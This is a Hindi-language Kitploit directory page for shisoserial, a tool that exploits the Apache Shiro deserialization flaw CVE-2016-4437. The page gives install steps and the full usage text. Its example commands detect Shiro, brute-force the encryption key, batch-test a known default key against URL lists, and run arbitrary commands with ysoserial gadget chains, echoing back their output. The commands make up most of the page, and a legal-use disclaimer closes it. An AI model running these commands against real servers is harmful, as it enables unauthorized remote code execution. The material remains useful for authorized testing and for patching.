Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
shisoserial — शिरो डिसीरियलाइजेशन भेद्यता (CVE-2016-4437) के लिए एक तेज़ उपयोग उपकरण/ysoserial के साथ शिरो फ्रेमवर्क हमलों के लिए एक सरल उपकरण। | Kitploit
उपकरण/GitHubGitHub/4nth0ny1130/shisoserial
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHub4nth0ny1130/shisoserial

shisoserial

शिरो डिसीरियलाइजेशन भेद्यता (CVE-2016-4437) के लिए एक तेज़ उपयोग उपकरण/ysoserial के साथ शिरो फ्रेमवर्क हमलों के लिए एक सरल उपकरण।

रिपॉजिटरी देखें
2424 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

shisoserial

English Document

यह क्या है?

शिरो डिसीरियलाइज़ेशन भेद्यता (CVE-2016-4437) के लिए एक त्वरित शोषण उपकरण

योगदानकर्ता

4nth0ny @ शुक्रवार प्रयोगशाला

issues/pr का स्वागत है

:)

पर्यावरण

  • python 3.x

  • JDK 1.8

स्थापना

root@kitploit:~
python3 -m pip install -r requirements.txt

के लिए AttributeError: module 'Crypto.Cipher.AES' has no attribute 'MODE_GCM' या No module named 'Crypto'

root@kitploit:~
python3 -m pip uninstall crypto pycryptodome
python3 -m pip install pycryptodome

उपयोग

root@kitploit:~
usage: shisoserial.py [-h] --mode MODE --url  [--type default:CBC] [--data] [--key] [--gadget] [--command default:whoami] [--proxies] [--ser] [--thread]

This is a simple tool to attack framework shiro with ysoserial

optional arguments:
  -h, --help            show this help message and exit
  --mode MODE, -m MODE  check/crack/yso/echo/encode
  --url , -u            Target URL address or the file containing the target URL
  --type default:CBC, -t default:CBC
                        Cipher Type, GCM or CBC
  --data , -d           Using this parameter will make HTTP request with POST method
  --key , -k            Specify a Shiro Key or will use dictionary brute force cracking
  --gadget , -g         Specific Ysoserial Gadget
  --command default:whoami, -c default:whoami
                        Specific Execute Command
  --proxies , -p        Specific Proxy
  --ser , -s            Specific serialize file name
  --thread , -T         Specific the number of threads

उदाहरण

जांचें कि लक्ष्य शिरो फ्रेमवर्क का उपयोग कर रहा है या नहीं (डिफ़ॉल्ट CBC एन्क्रिप्शन का उपयोग करके)

root@kitploit:~
python3 shisoserial.py -m check -u http://127.0.0.1:8080

प्रॉक्सी और CBC एन्क्रिप्शन का उपयोग करके लक्ष्य शिरो कुंजी को ब्रूट फोर्स करें

root@kitploit:~
python3 shisoserial.py -m crack -u http://*.*.*.*:**** -t CBC -p ****://*.*.*.*:****/

CommonsCollectionsK1 शोषण श्रृंखला का उपयोग करके कमांड निष्पादित करें और कमांड निष्पादन परिणाम प्राप्त करें

root@kitploit:~
python3 shisoserial.py -m echo -u http://127.0.0.1:8080 -g CommonsCollectionsK1 -c id

POST अनुरोध का उपयोग करके निर्दिष्ट शिरो कुंजी को बैच में सत्यापित करें

root@kitploit:~
python3 shisoserial.py -m crack -u target_urls.txt -k kPH+bIxk5D2deZiIxcaaaA== -d username=1

image-20211229223405240

सीरियलाइज़्ड डेटा फ़ाइल का उपयोग करके पेलोड बनाएं और मल्टी-थ्रेडिंग का उपयोग करके बैच में भेजें

root@kitploit:~
python3 shisoserial.py -m encode -u target_urls.txt -t cbc -s 1.ser -T 4

image-20211230181021173

अस्वीकरण

यह उपकरण केवल पर्याप्त कानूनी प्राधिकरण वाले उद्यम सुरक्षा निर्माण में उपयोग किया जा सकता है। इस उपकरण का उपयोग करते समय, आपको यह सुनिश्चित करना होगा कि आपके सभी कार्य स्थानीय कानूनों और विनियमों का अनुपालन करते हैं। यदि आप इस उपकरण का उपयोग करते समय कोई अवैध कार्य करते हैं, तो आप सभी परिणामों के लिए स्वयं जिम्मेदार होंगे, और इस उपकरण के सभी डेवलपर्स और सभी योगदानकर्ता किसी भी कानूनी या संयुक्त देयता को स्वीकार नहीं करते हैं। जब तक आपने इस समझौते के सभी नियमों को पूरी तरह से पढ़, समझ और स्वीकार नहीं कर लिया है, तब तक कृपया इस उपकरण को स्थापित और उपयोग न करें। आपके उपयोग का कार्य या इस समझौते को स्पष्ट या मौन रूप से स्वीकार करने का कोई अन्य तरीका माना जाएगा कि आपने इस समझौते को पढ़ लिया है और इसके बंधनों से सहमत हैं।

टूल डाउनलोड करें